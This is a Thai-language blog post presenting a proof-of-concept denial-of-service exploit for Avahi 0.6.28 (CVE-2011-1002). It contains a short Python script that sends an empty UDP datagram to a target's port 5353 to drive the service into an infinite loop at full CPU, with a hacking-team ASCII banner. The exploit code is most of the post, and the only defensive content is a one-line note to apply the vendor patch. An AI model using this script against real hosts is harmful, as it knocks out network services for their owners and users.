[PoC] zeroday denial of service(DoS) by MaYaSeVeN + Code

หลักการคือส่ง NULL Byte ไปโจมตี Service ทำให้เกิด Infinite loop และ CPU มาทำงานกับ Service นี้ 100%

Source Code :

#!/usr/bin/env python
#Exploit Title: Avahi 0.6.28 Denial of Service Vulnerability
#Date: 3/3/2011
#Author: MaYaSeVeN
#Blog: http://mayaseven.blogspot.com
#Video : [PoC] http://www.youtube.com/user/mayaseven
# Version: avahi <= 0.6.28
# Tested on: Debian 6(Squeeze)&Ubuntu 10.10
# CVE : CVE-2011-1002
import socket,sys
if len(sys.argv) != 2:
    print "Usage : avahi_DoS.py {Target IP}"
    sys.exit(1)
input = sys.argv[1]
sock = socket.socket(socket.SOCK_DGRAM,socket.AF_INET)
sock.sendto('',(input,5353))
print"  ,--^----------,--------,-----,-------^--,;"
print"  | |||||||||   `--------'     |          O    ... CWH Underground Hacking Team .."
print"  `+---------------------------^----------|                        By MaYaSeVeN"
print"    `\_,-------, _________________________|    [!] Thanks: CITEC Evolution, c1ph3r"
print"      / XXXXXX /`|     /"
print"     / XXXXXX /  `\   /"
print"    / XXXXXX /\______("
print"   / XXXXXX /    "  
print"  / XXXXXX /"
print" (________("            
print"  `------'" 
print "Exploit completed"

วิธีป้องกัน Update patch ล่าสุดจาก vendor

#เขียนโดย MaYaSeVeN 

avahi, denial of service, dos, python
Previous Post
ช่องโหว่ Web Browser แค่เหยื่อเปิดเว็บก็โดนยึดเครื่อง
Next Post
How to Sidejacking + Arpspoof

Related Posts

Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed